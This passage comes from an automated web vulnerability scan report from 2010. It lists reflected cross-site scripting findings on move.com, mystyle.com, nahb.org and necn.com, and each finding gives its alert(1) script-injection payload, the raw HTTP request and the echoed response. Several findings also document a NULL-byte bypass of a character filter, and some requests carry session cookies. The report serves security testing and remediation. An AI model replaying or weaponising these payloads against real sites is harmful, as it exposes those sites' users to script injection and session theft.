The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24430</script><script>alert(1)</script>20e42232118 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/holiday-gifts-for-the-dog-lover24430</script><script>alert(1)</script>20e42232118/ HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_code ...[SNIP]...
2.511. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/holiday-gifts-for-the-dog-lover/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 719ff</script><script>alert(1)</script>5e744f4ced2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/holiday-gifts-for-the-dog-lover/?719ff</script><script>alert(1)</script>5e744f4ced2=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f208</script><script>alert(1)</script>1d8647608ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/sweet-holiday-treats-in-san-francisco2f208</script><script>alert(1)</script>1d8647608ac/ HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_code ...[SNIP]...
2.513. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.move.com
Path:
/trends/sweet-holiday-treats-in-san-francisco/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2da9d</script><script>alert(1)</script>634675ff90a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trends/sweet-holiday-treats-in-san-francisco/?2da9d</script><script>alert(1)</script>634675ff90a=1 HTTP/1.1 Host: www.move.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
s.prop27="trends.move.com"; s.prop26= 'Not Registered'; var s_code=s.t(); if(s_co ...[SNIP]...
2.514. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mystyle.com
Path:
/mystyle/photos/gallery.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload ac901*/alert(1)//267d3ec3044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mystyle/photos/gallery.jsp?ac901*/alert(1)//267d3ec3044=1 HTTP/1.1 Host: www.mystyle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: edition=us; s_lv=1292783272263; CyberTargetAnonymous=CTLCFD02D70D3824770A4F7FC69490938E3; JSESSIONID=4946C5556DE8C4F50FD20777C1C43F10; __utmz=4334511.1292783273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_eVar10=0; s_photo_viewer=no-photo; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; photo=1; s_percentseen=0.5; s_cc=true; s_vi=[CS]v1|2687275E05011290-60000115E0008D9B[CE]; contribution=1; s_nr=1292783272265; __utma=4334511.925277804.1292783273.1292783273.1292783273.1; s_contributor=no-contributions; __utmc=4334511; __utmb=4334511.1.10.1292783273;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:43:35 GMT Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=60 Expires: Sun, 19 Dec 2010 18:44:35 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 11927
2.515. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mystyle.com
Path:
/mystyle/photos/gallery.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a7b3'-alert(1)-'31bccd1e610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mystyle/photos/gallery.jsp?7a7b3'-alert(1)-'31bccd1e610=1 HTTP/1.1 Host: www.mystyle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: edition=us; s_lv=1292783272263; CyberTargetAnonymous=CTLCFD02D70D3824770A4F7FC69490938E3; JSESSIONID=4946C5556DE8C4F50FD20777C1C43F10; __utmz=4334511.1292783273.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_eVar10=0; s_photo_viewer=no-photo; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; photo=1; s_percentseen=0.5; s_cc=true; s_vi=[CS]v1|2687275E05011290-60000115E0008D9B[CE]; contribution=1; s_nr=1292783272265; __utma=4334511.925277804.1292783273.1292783273.1292783273.1; s_contributor=no-contributions; __utmc=4334511; __utmb=4334511.1.10.1292783273;
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 18:43:32 GMT Server: Apache/2.2.2 (Unix) mod_jk/1.2.20 PHP/5.2.8 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=60 Expires: Sun, 19 Dec 2010 18:44:32 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 11927
// MS-553 /* var urlhash = document.location.hash; if(urlhash.length > ...[SNIP]...
2.516. http://www.nahb.org/news.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nahb.org
Path:
/news.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0099ce2"><script>alert(1)</script>83e8d49bc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99ce2"><script>alert(1)</script>83e8d49bc40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /news.aspx?%0099ce2"><script>alert(1)</script>83e8d49bc40=1 HTTP/1.1 Host: www.nahb.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:12:57 GMT Server: WWW Server/1.1 P3P: CP="OTI DSP COR CUR DEVi PSA IVA OUR DEL SAM IND UNI NAV PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: siteCookieTemp=1652480c-ab74-4941-b566-a52ef08cc114; domain=nahb.org; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 58387
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title> NAHB: View & Search News Releases </title><meta name="verify-v1" cont ...[SNIP]... <a href="/news.aspx?%0099ce2"><script>alert(1)</script>83e8d49bc40=1&print=true" id="ctl00_pfv_aPfLink"> ...[SNIP]...
2.517. http://www.nahb.org/page.aspx/landing/sectionID=85 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nahb.org
Path:
/page.aspx/landing/sectionID=85
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0092fba"><script>alert(1)</script>7bb7aa42834 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92fba"><script>alert(1)</script>7bb7aa42834 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page.aspx/landing/sectionID=85?%0092fba"><script>alert(1)</script>7bb7aa42834=1 HTTP/1.1 Host: www.nahb.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:09:50 GMT Server: WWW Server/1.1 P3P: CP="OTI DSP COR CUR DEVi PSA IVA OUR DEL SAM IND UNI NAV PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: siteCookieTemp=f6b50901-fced-482a-ac49-5187abeb50ff; domain=nahb.org; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 38223
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head><title> NAHB: Housing Industry Association, Market Information on Housing Indu ...[SNIP]... <a href="/page.aspx/landing/sectionID=85?%0092fba"><script>alert(1)</script>7bb7aa42834=1/print=true" id="ctl00_pfv_aPfLink"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e92"><script>alert(1)</script>754dcd99236 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1237e92"><script>alert(1)</script>754dcd99236/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=45c4034b3be571cead558b1fdb9fd020; path=/ Expires: Sun, 19 Dec 2010 18:42:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:43 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/1237e92"><script>alert(1)</script>754dcd99236/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5da3d"><script>alert(1)</script>886aefdb2ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/195da3d"><script>alert(1)</script>886aefdb2ca/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44827 Content-Type: text/html Set-Cookie: PHPSESSID=5750fd9d534e366007ec0d2eda3219cf; path=/ Expires: Sun, 19 Dec 2010 18:42:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:44 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/195da3d"><script>alert(1)</script>886aefdb2ca/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f3"><script>alert(1)</script>da8131b3d5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10a00f3"><script>alert(1)</script>da8131b3d5/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44842 Content-Type: text/html Set-Cookie: PHPSESSID=70e6f16534e048ee86d20c4979944d23; path=/ Expires: Sun, 19 Dec 2010 18:42:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:45 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10a00f3"><script>alert(1)</script>da8131b3d5/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bff77"><script>alert(1)</script>a29c90745a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-decbff77"><script>alert(1)</script>a29c90745a1/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=f4bb7279c6dc802b2fa13fd549830b2d; path=/ Expires: Sun, 19 Dec 2010 18:42:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:47 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-decbff77"><script>alert(1)</script>a29c90745a1/landing.html"> ...[SNIP]...
2.522. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f02b"><script>alert(1)</script>b4a31179593 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html?9f02b"><script>alert(1)</script>b4a31179593=1 HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44852 Content-Type: text/html Set-Cookie: PHPSESSID=99f484b06ae8e7beebde2bc6c3612e53; path=/ Expires: Sun, 19 Dec 2010 18:42:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:42 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="9f02b"><script>alert(1)</script>b4a31179593" id = "9f02b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88b8"><script>alert(1)</script>728977ee5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a88b8"><script>alert(1)</script>728977ee5f2/19/10/Holiday-mad-dash/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44750 Content-Type: text/html Set-Cookie: PHPSESSID=e24cde4c3a04724bef9fe26bc905c38a; path=/ Expires: Sun, 19 Dec 2010 18:42:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a88b8"><script>alert(1)</script>728977ee5f2/19/10/Holiday-mad-dash/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bac"><script>alert(1)</script>808ccd5b970 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/1921bac"><script>alert(1)</script>808ccd5b970/10/Holiday-mad-dash/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44731 Content-Type: text/html Set-Cookie: PHPSESSID=a009713ce989df18102c243578949687; path=/ Expires: Sun, 19 Dec 2010 18:42:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/1921bac"><script>alert(1)</script>808ccd5b970/10/Holiday-mad-dash/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ca7"><script>alert(1)</script>fe484db570f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/1049ca7"><script>alert(1)</script>fe484db570f/Holiday-mad-dash/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44750 Content-Type: text/html Set-Cookie: PHPSESSID=f12205855efefc6c0f7e380c6587b691; path=/ Expires: Sun, 19 Dec 2010 18:42:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:53 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/1049ca7"><script>alert(1)</script>fe484db570f/Holiday-mad-dash/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e588e"><script>alert(1)</script>4ea27e8753e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Holiday-mad-dashe588e"><script>alert(1)</script>4ea27e8753e/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44750 Content-Type: text/html Set-Cookie: PHPSESSID=af353e044142f9e0427a8d0d4d46add5; path=/ Expires: Sun, 19 Dec 2010 18:42:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:54 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Holiday-mad-dashe588e"><script>alert(1)</script>4ea27e8753e/landing.html"> ...[SNIP]...
2.527. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.necn.com
Path:
/12/19/10/Holiday-mad-dash/landing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52c8"><script>alert(1)</script>90de578ba5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Holiday-mad-dash/landing.html?c52c8"><script>alert(1)</script>90de578ba5a=1 HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44737 Content-Type: text/html Set-Cookie: PHPSESSID=11d20b943b6ac7b9c0f53cbbb62f208a; path=/ Expires: Sun, 19 Dec 2010 18:42:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:49 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="c52c8"><script>alert(1)</script>90de578ba5a" id = "c52c8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc0b"><script>alert(1)</script>fdc2925be5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /123dc0b"><script>alert(1)</script>fdc2925be5f/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44827 Content-Type: text/html Set-Cookie: PHPSESSID=006b23cb6c4b6c1dd81e71fc7034f853; path=/ Expires: Sun, 19 Dec 2010 18:42:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:56 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/123dc0b"><script>alert(1)</script>fdc2925be5f/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78d69"><script>alert(1)</script>5097c19b3b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/1978d69"><script>alert(1)</script>5097c19b3b8/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44827 Content-Type: text/html Set-Cookie: PHPSESSID=af45f10b65ea1c276a93d609e49f5979; path=/ Expires: Sun, 19 Dec 2010 18:42:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:57 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/1978d69"><script>alert(1)</script>5097c19b3b8/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80369"><script>alert(1)</script>b78a22fbae5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/1080369"><script>alert(1)</script>b78a22fbae5/Man-in-custody-for-Taunton-Mass-stabbing/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44827 Content-Type: text/html Set-Cookie: PHPSESSID=42aa0e7c2017c0492a8198e20dd2de79; path=/ Expires: Sun, 19 Dec 2010 18:42:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/1080369"><script>alert(1)</script>b78a22fbae5/Man-in-custody-for-Taunton-Mass-stabbing/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fbc3"><script>alert(1)</script>8d5270c27c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing1fbc3"><script>alert(1)</script>8d5270c27c8/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
